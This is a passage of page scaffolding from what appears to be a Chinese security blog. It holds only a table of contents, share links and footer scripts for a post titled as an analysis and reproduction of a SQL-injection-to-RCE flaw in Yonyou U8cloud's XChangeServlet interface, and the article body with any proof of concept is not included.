        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A1%A5%E4%B8%81%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">补丁分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC%E6%9E%84%E9%80%A0"><span class="toc-number">3.</span> <span class="toc-text">POC构造</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D"><span class="toc-number">4.</span> <span class="toc-text">修复</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&text="><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&is_video=false&description="><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&name=&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&t="><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2026
    Xsheep
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
      --><li><a href="/">首页</a></li><!--
    --><!--
      --><li><a href="/archives/">归档</a></li><!--
    --><!--
      --><li><a href="/about/">关于</a></li><!--
    --><!--
      --><li><a href="/link/">link</a></li><!--
    -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  
</footer>



    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
